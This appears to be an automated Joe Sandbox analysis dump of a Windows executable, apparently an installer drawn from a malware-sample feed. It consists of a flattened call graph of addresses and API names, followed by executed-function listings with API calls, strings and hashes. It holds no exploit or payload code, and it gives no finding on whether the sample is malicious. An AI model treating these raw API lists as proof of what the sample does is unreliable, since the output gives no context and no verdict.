44eae0 52055 35a850 2 API calls 52054->52055 52056 44eaea 52055->52056 52058 35a850 2 API calls 52056->52058 52057 44eaaf 52057->51936 52061 44eaf4 52058->52061 52059->52054 52059->52057 52060 44ead6 52059->52060 52064 44e9e7 52059->52064 52063 35a850 2 API calls 52060->52063 52062 44eb0b 52061->52062 52065 529d16 ___std_exception_destroy 2 API calls 52061->52065 52062->51936 52063->52054 52066 44e9f5 52064->52066 52097 44eb50 RtlAllocateHeap RaiseException 52064->52097 52067 44eb39 52065->52067 52098 529907 24 API calls 2 library calls 52066->52098 52067->51936 52070 44ea0d 52070->52056 52072 44ea41 52070->52072 52099 35a660 26 API calls 52070->52099 52072->52056 52072->52072 52073 44ea91 52072->52073 52073->52057 52100 44eb10 RtlFreeHeap GetLastError ___std_exception_destroy 52073->52100 52075->51936 52076->51936 52077->51936 52079 364a51 52078->52079 52082 3649f8 52078->52082 52080 35a850 2 API calls 52079->52080 52081 364a5b 52080->52081 52082->51975 52082->51976 52083->51957 52084->51974 52085->51969 52086->51987 52087->51975 52088->51986 52089->52005 52090->52019 52091->52015 52092->52028 52093->52028 52094->51970 52095->52049 52096->52041 52097->52066 52098->52070 52099->52072 52100->52057 52101 48f2c0 52102 48f318 52101->52102 52107 48f2f7 52101->52107 52103 48f346 CreateFileW 52102->52103 52104 48f4ce 52102->52104 52108 48f338 52102->52108 52105 48f36f 52103->52105 52106 35a850 2 API calls 52104->52106 52109 48f396 GetLastError 52105->52109 52110 48f417 52105->52110 52111 48f4d8 52106->52111 52107->52102 52107->52104 52146 371bb0 26 API calls 52107->52146 52108->52103 52147 371bb0 26 API calls 52108->52147 52114 48f3ad 52109->52114 52131 4b00a0 52110->52131 52148 46cae0 84 API calls 52114->52148 52116 48f420 52118 48f42a 52116->52118 52119 48f4ae 52116->52119 52122 48f475 52118->52122 52123 48f42f GetLastError 52118->52123 52140 4912a0 52119->52140 52120 48f3c5 52149 47ca50 43 API calls 52120->52149 52125 48f449 52123->52125 52150 46cae0 84 API calls 52125->52150 52128 48f3db 52129 48f45d 52151 47ca50 43 API calls 52129->52151 52136 4b00e6 52131->52136 52132 4b013b SetFilePointer 52134 4b0162 ReadFile 52132->52134 52135 4b0154 GetLastError 52132->52135 52133 4b00ed 52133->52116 52134->52133 52134->52136 52135->52133 52135->52134 52136->52132 52136->52133 52137 4b0216 SetFilePointer 52136->52137 52137->52133 52138 4b023e ReadFile 52137->52138 52138->52133 52139 4b0255 52138->52139 52139->52133 52152 491f00 52140->52152 52142 4912af 52143 48f4bc 52142->52143 52144 35a850 2 API calls 52142->52144 52145 4912f2 52144->52145 52146->52102 52147->52103 52148->52120 52149->52128 52150->52129 52151->52122 52153 491f4b SetFilePointer 52152->52153 52154 491fed 52152->52154 52153->52154 52155 492001 52153->52155 52154->52142 52156 35ab90 12 API calls 52155->52156 52157 492021 52156->52157 52158 49233f 52157->52158 52161 49205f ReadFile 52157->52161 52166 492205 52157->52166 52159 35a850 2 API calls 52158->52159 52160 492349 52159->52160 52162 35a850 2 API calls 52160->52162 52163 4922c1 GetLastError 52161->52163 52161->52166 52164 492353 52162->52164 52165 4922de 52163->52165 52164->52142 52170 46cae0 84 API calls 52165->52170 52166->52142 52168 4922f8 52171 47ca50 43 API calls 52168->52171 52170->52168 52171->52158 52172 38b0b0 52173 38b0c3 52172->52173 52178 521a9d 52173->52178 52176 38b0d9 SetUnhandledExceptionFilter 52177 38b0eb 52176->52177 52179 521ad5 __set_se_translator 34 API calls 52178->52179 52180 521aa6 52179->52180 52181 521ad5 __set_se_translator 34 API calls 52180->52181 52182 38b0cd 52181->52182 52182->52176 52182->52177 52183 4aba60 52184 4aba8f 52183->52184 52185 4abaa5 52183->52185 52186 35ab90 12 API calls 52185->52186 52187 4abaaa 52186->52187 52188 4abbb4 52187->52188 52189 4abab4 52187->52189 52190 35a850 2 API calls 52188->52190 52207 359bb0 43 API calls 52189->52207 52191 4abbbe 52190->52191 52192 35ab90 12 API calls 52191->52192 52202 4abbf5 52192->52202 52194 4abda9 52195 35a850 2 API calls 52194->52195 52196 4abdb3 52195->52196 52197 35a850 2 API calls 52196->52197 52198 4abdbd 52197->52198 52199 4abad9 52200 35ab90 12 API calls 52200->52202 52201 35a660 26 API calls 52201->52202 52202->52194 52202->52196 52202->52200 52202->52201 52203 3649d0 2 API calls 52202->52203 52204 4abd42 52202->52204 52205 4abd52 52202->52205 52203->52202 52204->52205 52206 371a90 26 API calls 52204->52206 52206->52205 52207->52199 52208 4bf480 52219 4beba0 52208->52219 52210 4bf4aa 52228 4bf550 52210->52228 52213 4bf4ba 52251 4bf9f0 52213->52251 52216 4bf4c1 52259 4bfc20 52216->52259 52218 4bf4cc 52220 35cd80 25 API calls 52219->52220 52222 4bebb8 52220->52222 52221 358810 24 API calls 52221->52222 52222->52221 52224 4bebd0 52222->52224 52223 4bebf1 52227 4bec12 52223->52227 52294 359400 24 API calls std::_Throw_Cpp_error 52223->52294 52224->52223 52293 4c1070 24 API calls 52224->52293 52227->52210 52283 35cd80 52227->52283 52229 4bf9bc 52228->52229 52230 4bf5c0 52228->52230 52229->52213 52231 358190 25 API calls 52230->52231 52240 4bf5dc 52231->52240 52232 4bf6ff 52295 359bd0 52232->52295 52234 358190 25 API calls 52234->52240 52235 4bf713 52237 358810 24 API calls 52235->52237 52238 4bf74e 52237->52238 52239 358810 24 API calls 52238->52239 52249 4bf75a 52239->52249 52240->52232 52240->52234 52241 358810 24 API calls 52240->52241 52243 4bf9df 52240->52243 52300 3815f0 25 API calls 52240->52300 52241->52240 52242 4bf95e 52244 358810 24 API calls 52242->52244 52245 5252ff std::_Throw_Cpp_error 24 API calls 52243->52245 52244->52229 52246 4bf9e4 52245->52246 52247 358190 25 API calls 52247->52249 52249->52242 52249->52243 52249->52247 52250 358810 24 API calls 52249->52250 52301 3815f0 25 API calls 52249->52301 52250->52249 52252 4bfa25 52251->52252 52254 4bfa2c 52251->52254 52252->52216 52255 358190 25 API calls 52254->52255 52257 4bfb37 52254->52257 52303 38a7a0 25 API calls 52254->52303 52255->52254 52257->52252 52304 52a3fe 29 API calls 52257->52304 52305 4c1240 26 API calls 52257->52305 52260 4c0556 52259->52260 52266 4bfc83 __set_se_translator 52259->52266 52260->52218 52261 51fea9 3 API calls 52261->52266 52266->52260 52266->52261 52268 4c0f00 26 API calls 52266->52268 52269 4c058a 52266->52269 52270 358810 24 API calls 52266->52270 52273 358190 25 API calls 52266->52273 52274 35cd80 25 API calls 52266->52274 52282 4c0279 52266->52282 52306 4c15a0 52266->52306 52340 4620b0 25 API calls 52266->52340 52341 35ee10 25 API calls 52266->52341 52342 4be850 11 API calls __Init_thread_footer 52266->52342 52343 466fc0 25 API calls 2 library calls 52266->52343 52345 470790 25 API calls 2 library calls 52266->52345 52346 4c1a70 25 API calls 52266->52346 52347 4c1370 25 API calls std::_Throw_Cpp_error 52266->52347 52348 4c1940 52266->52348 52353 3826a0 24 API calls 52266->52353 52268->52266 52271 5252ff std::_Throw_Cpp_error 24 API calls 52269->52271 52270->52266 52272 4c058f 52271->52272 52273->52266 52274->52266 52280 358810 24 API calls 52280->52282 52282->52266 52282->52280 52344 4bf2e0 46 API calls 2 library calls 52282->52344 52286 35cd91 52283->52286 52287 35cdcd 52283->52287 52284 35ce81 52374 358760 RaiseException 52284->52374 52286->52210 52287->52284 52289 358700 25 API calls 52287->52289 52290 35ce16 52289->52290 52291 35ce65 52290->52291 52292 5252ff std::_Throw_Cpp_error 24 API calls 52290->52292 52291->52210 52292->52284 52293->52223 52294->52223 52296 359c10 52295->52296 52296->52296 52299 359c30 52296->52299 52302 358760 RaiseException 52296->52302 52299->52235 52300->52240 52301->52249 52303->52254 52304->52257 52305->52257 52307 4c1797 52306->52307 52308 4c15f0 52306->52308 52359 357b70 RaiseException 52307->52359 52310 4c1792 52308->52310 52314 4c163c 52308->52314 52315 4c1663 52308->52315 52358 3586e0 25 API calls std::_Throw_Cpp_error 52310->52358 52312 4c1738 52313 5252ff std::_Throw_Cpp_error 24 API calls 52312->52313 52339 4c175d 52312->52339 52316 4c17a1 52313->52316 52314->52310 52317 4c1647 52314->52317 52318 51fea9 3 API calls 52315->52318 52321 4c164d 52315->52321 52360 4c1070 24 API calls 52316->52360 52320 51fea9 3 API calls 52317->52320 52318->52321 52320->52321 52321->52312 52323 4c1940 25 API calls 52321->52323 52322 4c17ad 52361 376690 24 API calls std::_Throw_Cpp_error 52322->52361 52325 4c169f 52323->52325 52327 4c16fe 52325->52327 52328 4c16b1 52325->52328 52326 4c17bb 52329 521bfa std::_Throw_Cpp_error RaiseException 52326->52329 52355 4c1870 25 API calls 52327->52355 52333 4c16e4 52328->52333 52336 4c1940 25 API calls 52328->52336 52331 4c17c4 52329->52331 52332 4c1709 52356 4c1870 25 API calls 52332->52356 52354 4c1070 24 API calls 52333->52354 52336->52328 52337 4c16f3 52337->52339 52357 4c1070 24 API calls 52337->52357 52339->52266 52340->52266 52341->52266 52342->52266 52343->52266 52344->52282 52345->52266 52346->52266 52347->52266 52349 51fea9 3 API calls 52348->52349 52350 4c1989 52349->52350 52362 4c1b70 52350->52362 52353->52266 52354->52337 52355->52332 52356->52337 52357->52312 52358->52307 52360->52322 52361->52326 52363 4c1bb2 52362->52363 52373 4c19b4 52362->52373 52364 51fea9 3 API calls 52363->52364 52365 4c1bd4 52364->52365 52366 357690 25 API calls 52365->52366 52367 4c1bea 52366->52367 52368 357690 25 API calls 52367->52368 52369 4c1bfa 52368->52369 52370 4c1b70 25 API calls 52369->52370 52371 4c1c4b 52370->52371 52372 4c1b70 25 API calls 52371->52372 52372->52373 52373->52266 52375 523be0 52379 523bfe ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 52375->52379 52376 523c7e _ValidateLocalCookies 52378 523d07 _ValidateLocalCookies 52388 524ef7 7 API calls 2 library calls 52378->52388 52379->52376 52387 524ec0 RtlUnwind 52379->52387 52381 523d43 52382 523d47 52381->52382 52389 521bac 52381->52389 52384 523d4f 52385 523d5a 52384->52385 52397 524f33 DeleteCriticalSection 52384->52397 52387->52378 52388->52381 52398 524c57 52389->52398 52391 521bb6 52392 521bc1 52391->52392 52404 524d08 6 API calls ___vcrt_FlsGetValue 52391->52404 52392->52384 52394 521bcf 52395 521bdc 52394->52395 52405 521bdf 6 API calls ___vcrt_FlsFree 52394->52405 52395->52384 52397->52382 52406 524b6c 52398->52406 52401 524c8a TlsAlloc 52402 524c7a FlsAlloc 52402->52391 52404->52394 52405->52392 52407 524b89 52406->52407 52408 524b8d 52406->52408 52407->52401 52407->52402 52408->52407 52409 524bf5 GetProcAddress 52408->52409 52412 524be6 52408->52412 52414 524c0c LoadLibraryExW GetLastError LoadLibraryExW ___vcrt_FlsGetValue 52408->52414 52409->52407 52411 524c03 52409->52411 52411->52407 52412->52409 52413 524bee FreeLibrary 52412->52413 52413->52409 52414->52408 52415 452170 52416 4521a7 52415->52416 52420 4521e7 52415->52420 52417 520372 6 API calls 52416->52417 52418 4521b1 52417->52418 52418->52420 52421 520328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 52418->52421 52421->52420 52422 35aa60 52423 35aaa4 52422->52423 52424 35aa6c 52422->52424 52424->52423 52425 35a850 2 API calls 52424->52425 52425->52423 52426 461850 52427 46189b 52426->52427 52431 461888 52426->52431 52432 451130 33 API calls 2 library calls 52427->52432 52429 4618a5 52430 358810 24 API calls 52429->52430 52430->52431 52432->52429 52433 46cf10 52434 46c960 5 API calls 52433->52434 52435 46cf41 52434->52435 52436 46cf45 52435->52436 52437 46cf59 PathIsUNCW 52435->52437 52461 46cb90 52437->52461 52439 46cf8e 52440 46d121 52439->52440 52441 35a380 26 API calls 52439->52441 52442 35a850 2 API calls 52440->52442 52453 46cfa5 52441->52453 52443 46d12b CreateFileW 52442->52443 52444 46d18c GetFileSize 52443->52444 52445 46d19a 52443->52445 52444->52445 52446 46d1b4 CloseHandle 52445->52446 52447 46d1c2 52445->52447 52446->52447 52448 35a380 26 API calls 52448->52453 52450 46d0a7 52451 3711b0 96 API calls 52452 46d014 CreateDirectoryW 52451->52452 52452->52453 52454 46d028 GetLastError 52452->52454 52453->52440 52453->52448 52453->52451 52456 46d046 52453->52456 52457 46d053 52453->52457 52460 3711b0 96 API calls 52453->52460 52540 46aaa0 119 API calls 52453->52540 52454->52453 52456->52457 52458 46d04b 52456->52458 52539 456ea0 RtlFreeHeap GetLastError ___std_exception_destroy 52457->52539 52538 46c5d0 102 API calls 52458->52538 52460->52453 52462 35ab90 12 API calls 52461->52462 52463 46cbc9 52462->52463 52464 46ceee 52463->52464 52467 35ab90 12 API calls 52463->52467 52465 35a850 2 API calls 52464->52465 52466 46cef8 52465->52466 52468 35a850 2 API calls 52466->52468 52469 46cbea 52467->52469 52470 46cf02 52468->52470 52469->52464 52471 46cbf2 52469->52471 52472 46c960 5 API calls 52470->52472 52541 46cae0 84 API calls 52471->52541 52473 46cf41 52472->52473 52475 46cf45 52473->52475 52476 46cf59 PathIsUNCW 52473->52476 52475->52439 52477 46cb90 122 API calls 52476->52477 52479 46cf8e 52477->52479 52478 46cc0a 52480 46cc15 52478->52480 52481 46cd19 52478->52481 52483 46d121 52479->52483 52486 35a380 26 API calls 52479->52486 52484 46ccaa 52480->52484 52498 46cc3b 52480->52498 52482 371a90 26 API calls 52481->52482 52485 46cd22 PathIsUNCW 52482->52485 52488 35a850 2 API calls 52483->52488 52487 364e60 84 API calls 52484->52487 52490 46cd3c 52485->52490 52521 46cfa5 52486->52521 52491 46ccc4 52487->52491 52489 46d12b CreateFileW 52488->52489 52492 46d19a 52489->52492 52493 46d18c GetFileSize 52489->52493 52496 364e60 84 API calls 52490->52496 52495 371a90 26 API calls 52491->52495 52499 46d1b4 CloseHandle 52492->52499 52500 46d1c2 52492->52500 52493->52492 52494 46d053 52559 456ea0 RtlFreeHeap GetLastError ___std_exception_destroy 52494->52559 52497 46ccd7 52495->52497 52502 46cd68 52496->52502 52505 3711b0 96 API calls 52497->52505 52504 364e60 84 API calls 52498->52504 52499->52500 52500->52439 52501 35a380 26 API calls 52501->52521 52508 3711b0 96 API calls 52502->52508 52507 46cc55 52504->52507 52509 46cca8 52505->52509 52506 46d0a7 52506->52439 52510 371a90 26 API calls 52507->52510 52513 46cd7a 52508->52513 52509->52485 52512 46cc68 52510->52512 52511 3711b0 96 API calls 52511->52521 52514 3711b0 96 API calls 52512->52514 52516 46cdaf 52513->52516 52517 46cdf8 52513->52517 52514->52509 52515 3711b0 96 API calls 52518 46d014 CreateDirectoryW 52515->52518 52519 44e930 38 API calls 52516->52519 52520 44e930 38 API calls 52517->52520 52518->52521 52522 46d028 GetLastError 52518->52522 52523 46cdbb 52519->52523 52524 46ce1d 52520->52524 52521->52483 52521->52494 52521->52501 52521->52511 52521->52515 52529 46d046 52521->52529 52560 46aaa0 119 API calls 52521->52560 52522->52521 52542 46f770 52523->52542 52526 46f770 119 API calls 52524->52526 52527 46ce30 52526->52527 52555 46aaa0 119 API calls 52527->52555 52529->52494 52530 46d04b 52529->52530 52558 46c5d0 102 API calls 52530->52558 52533 46cdce 52533->52439 52534 46ce96 52557 456ea0 RtlFreeHeap GetLastError ___std_exception_destroy 52534->52557 52536 46ce5d 52536->52466 52536->52534 52556 46aaa0 119 API calls 52536->52556 52538->52457 52539->52450 52540->52453 52541->52478 52561 456ea0 RtlFreeHeap GetLastError ___std_exception_destroy 52542->52561 52544 46f8d3 52564 46aaa0 119 API calls 52544->52564 52546 46f85f 52546->52544 52547 46f866 52546->52547 52548 364e60 84 API calls 52547->52548 52549 46f881 52548->52549 52563 46aaa0 119 API calls 52549->52563 52551 46f7b4 52551->52544 52551->52546 52552 364e60 84 API calls 52551->52552 52553 46f894 52551->52553 52562 46aaa0 119 API calls 52551->52562 52552->52551 52553->52533 52555->52536 52556->52536 52557->52533 52558->52494 52559->52506 52560->52521 52561->52551 52562->52551 52563->52553 52564->52553 52565 368da1 52566 368e27 52565->52566 52567 368e36 CallWindowProcW 52566->52567 52568 368e4c GetWindowLongW CallWindowProcW 52566->52568 52571 368e9b 52566->52571 52567->52571 52569 368e80 GetWindowLongW 52568->52569 52568->52571 52570 368e8d SetWindowLongW 52569->52570 52569->52571 52570->52571 52572 380d20 52573 51fea9 3 API calls 52572->52573 52574 380d64 52573->52574 52577 36e010 25 API calls std::_Throw_Cpp_error 52574->52577 52576 380daf 52577->52576 52578 4864f0 52594 48f5c0 52578->52594 52580 48652c 52581 486543 CreateFileW 52580->52581 52593 48662a 52580->52593 52582 486581 SetFilePointer 52581->52582 52586 486570 52581->52586 52584 4865ae 52582->52584 52582->52586 52583 48665a FindCloseChangeNotification 52583->52593 52585 44e930 38 API calls 52584->52585 52587 4865bd 52585->52587 52586->52583 52586->52593 52588 4865d8 ReadFile 52587->52588 52589 35a550 26 API calls 52587->52589 52588->52586 52590 4865eb 52588->52590 52591 4865d5 52589->52591 52590->52586 52592 4a92e0 121 API calls 52590->52592 52591->52588 52592->52586 52595 48f667 52594->52595 52602 491100 RtlAllocateHeap RaiseException 52595->52602 52597 48f66e 52598 35ab90 12 API calls 52597->52598 52599 48f73e 52598->52599 52600 35a850 2 API calls 52599->52600 52601 48f797 52600->52601 52602->52597 52603 491370 52604 491ba0 52603->52604 52605 35a850 2 API calls 52604->52605 52606 491baa 52605->52606 52607 35a850 2 API calls 52606->52607 52608 491bb4 52607->52608 52609 35a850 2 API calls 52608->52609 52610 491bbe 52609->52610 52611 35a850 2 API calls 52610->52611 52612 495d90 52613 371a90 26 API calls 52612->52613 52614 495dbf 52613->52614 52615 371a90 26 API calls 52614->52615 52616 495dcb 52615->52616 52621 477070 52616->52621 52618 495dd3 52644 359bb0 43 API calls 52618->52644 52620 495df3 52622 35a380 26 API calls 52621->52622 52623 4770af 52622->52623 52624 4770d0 GetFileVersionInfoSizeW 52623->52624 52645 35a550 26 API calls 3 library calls 52623->52645 52627 4770f5 52624->52627 52628 4770e8 52624->52628 52626 4770cd 52626->52624 52627->52618 52628->52627 52629 47711a GetFileVersionInfoW 52628->52629 52646 35a550 26 API calls 3 library calls 52628->52646 52629->52627 52631 477131 52629->52631 52633 35ab90 12 API calls 52631->52633 52632 477117 52632->52629 52634 477136 52633->52634 52635 477280 52634->52635 52638 477140 52634->52638 52636 35a850 2 API calls 52635->52636 52637 47728a 52636->52637 52647 359bb0 43 API calls 52638->52647 52640 477198 52642 4771af 52640->52642 52648 35a550 26 API calls 3 library calls 52640->52648 52642->52627 52649 35a6d0 26 API calls 3 library calls 52642->52649 52644->52620 52645->52626 52646->52632 52647->52640 52648->52642 52649->52627 52650 3c8d40 52661 368cf0 EnterCriticalSection 52650->52661 52652 3c8d4e 52653 3c8d48 52653->52652 52656 3c8d70 52653->52656 52672 51fa13 GetProcessHeap HeapAlloc 52653->52672 52657 3c8d7f 52656->52657 52665 51fb15 52656->52665 52682 51fa78 RtlDecodePointer LoadLibraryExA DecodePointer GetProcAddress RtlEncodePointer 52657->52682 52659 3c8d87 SetWindowLongW 52660 3c8da2 52659->52660 52662 368d73 LeaveCriticalSection 52661->52662 52663 368d40 GetCurrentThreadId 52661->52663 52662->52653 52664 368d50 52663->52664 52664->52662 52666 51fb20 52665->52666 52671 51fb37 52665->52671 52667 51fb39 52666->52667 52668 51fb2c 52666->52668 52666->52671 52683 51f7a5 52667->52683 52697 51f87c GetCurrentProcess FlushInstructionCache 52668->52697 52671->52657 52673 51fa2b 52672->52673 52674 51fa2f 52672->52674 52673->52656 52675 51f7a5 5 API calls 52674->52675 52676 51fa3a 52675->52676 52677 51fa56 52676->52677 52678 51fa4a 52676->52678 52701 51f8b1 15 API calls __set_se_translator 52677->52701 52680 51fa63 GetProcessHeap HeapFree 52678->52680 52681 51fa74 52678->52681 52680->52673 52681->52656 52682->52659 52684 51f7b2 RtlDecodePointer 52683->52684 52685 51f7bf LoadLibraryExA 52683->52685 52684->52671 52686 51f7d8 52685->52686 52687 51f850 52685->52687 52698 51f855 GetProcAddress 52686->52698 52687->52671 52689 51f7e8 52689->52687 52690 51f855 2 API calls 52689->52690 52691 51f7ff 52690->52691 52691->52687 52692 51f855 2 API calls 52691->52692 52693 51f816 52692->52693 52693->52687 52694 51f855 2 API calls 52693->52694 52695 51f82d 52694->52695 52695->52687 52696 51f834 DecodePointer 52695->52696 52696->52687 52697->52671 52699 51f868 52698->52699 52700 51f86c RtlEncodePointer 52698->52700 52699->52689 52700->52689 52701->52678 52702 51c94c 52703 51c93b 52702->52703 52703->52702 52705 51d43d 52703->52705 52731 51d19b 52705->52731 52707 51d44d 52708 51d4aa 52707->52708 52709 51d4ce 52707->52709 52740 51d3db 6 API calls 3 library calls 52708->52740 52712 51d546 LoadLibraryExA 52709->52712 52713 51d5a7 52709->52713 52718 51d5b9 52709->52718 52720 51d675 52709->52720 52711 51d4b5 RaiseException 52727 51d6a3 52711->52727 52712->52713 52714 51d559 GetLastError 52712->52714 52717 51d5b2 FreeLibrary 52713->52717 52713->52718 52715 51d582 52714->52715 52722 51d56c 52714->52722 52741 51d3db 6 API calls 3 library calls 52715->52741 52716 51d617 GetProcAddress 52716->52720 52721 51d627 GetLastError 52716->52721 52717->52718 52718->52716 52718->52720 52743 51d3db 6 API calls 3 library calls 52720->52743 52724 51d63a 52721->52724 52722->52713 52722->52715 52723 51d58d RaiseException 52723->52727 52724->52720 52742 51d3db 6 API calls 3 library calls 52724->52742 52727->52703 52728 51d65b RaiseException 52729 51d19b DloadAcquireSectionWriteAccess 6 API calls 52728->52729 52730 51d672 52729->52730 52730->52720 52732 51d1a7 52731->52732 52733 51d1cd 52731->52733 52744 51d244 GetModuleHandleW GetProcAddress GetProcAddress DloadAcquireSectionWriteAccess 52732->52744 52733->52707 52735 51d1ac 52737 51d1c8 52735->52737 52745 51d36d VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 52735->52745 52746 51d1ce GetModuleHandleW GetProcAddress GetProcAddress 52737->52746 52739 51d416 52739->52707 52740->52711 52741->52723 52742->52728 52743->52727 52744->52735 52745->52737 52746->52739

                                                    Executed Functions

                                                    Function 00481960 Relevance: 37.4, APIs: 11, Strings: 10, Instructions: 622libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00481B65
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00481C60
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00481D60
                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00481E45
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00481F8C
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 00482072
                                                    • __Init_thread_footer.LIBCMT ref: 004820E6
                                                    • LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 004820FC
                                                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0048212E
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 0048219C
                                                    • SHGetMalloc.SHELL32(00000000), ref: 004821B5
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Directory$FolderPathWindows$AddressAllocateFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
                                                    • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                    • API String ID: 2816963309-2142986682
                                                    • Opcode ID: a4eda41a791da42c7e5940480ab8dbeab5e0444790aa4b5bcd92bd4f57186d8b
                                                    • Instruction ID: 14a9940dfdc3f9cea0c819abb83329cb9e8d3fe1b955e4a83a2b099a9ee9275a
                                                    • Opcode Fuzzy Hash: a4eda41a791da42c7e5940480ab8dbeab5e0444790aa4b5bcd92bd4f57186d8b
                                                    • Instruction Fuzzy Hash: 60321470A006058BDB24EF24CC44BBEB7B5FF51300F14469ED9069B3A1EB759E86DB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004867F0 Relevance: 32.8, APIs: 11, Strings: 7, Instructions: 1264synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetTickCount.KERNEL32 ref: 00486874
                                                    • __Xtime_get_ticks.LIBCPMT ref: 0048687C
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004868C6
                                                    • __Init_thread_footer.LIBCMT ref: 00486AB1
                                                    • GetCurrentProcess.KERNEL32(00000008,?,D13B3340), ref: 00486CA8
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00486CAF
                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00486CDE
                                                    • CloseHandle.KERNEL32(00000000), ref: 00486CF3
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                      • Part of subcall function 00471DA0: __Init_thread_footer.LIBCMT ref: 00471E16
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004874B5
                                                    • CreateThread.KERNEL32 ref: 004874F0
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00487523
                                                      • Part of subcall function 0048A490: GetCurrentProcess.KERNEL32(?,D13B3340), ref: 0048A4F9
                                                      • Part of subcall function 0048A490: IsWow64Process.KERNEL32(00000000), ref: 0048A500
                                                      • Part of subcall function 0048A490: _wcsrchr.LIBVCRUNTIME ref: 0048A581
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Process$Init_thread_footer$CreateCurrentHeapToken$AllocateCloseCountEventFindHandleInformationObjectOpenResourceSingleThreadTickUnothrow_t@std@@@WaitWow64Xtime_get_ticks__ehfuncinfo$??2@_wcsrchr
                                                    • String ID: /uninstall$VersionString$\/:*?"<>|$\\?\$nT$c$c
                                                    • API String ID: 2945862171-3201994613
                                                    • Opcode ID: 806411e6c38636708248eab5b8204ed6195a21a088df9aa525dfbf491abfa630
                                                    • Instruction ID: c2c591f6b347215702b72d4e05983fbc50253ba8dcfdada575b3fa5eda95d3ad
                                                    • Opcode Fuzzy Hash: 806411e6c38636708248eab5b8204ed6195a21a088df9aa525dfbf491abfa630
                                                    • Instruction Fuzzy Hash: 44B2F330A00605DFDB14EFA8C854BAEBBB5FF05314F24865AE815AB3D1DB78AD05CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004927F0 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 624COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
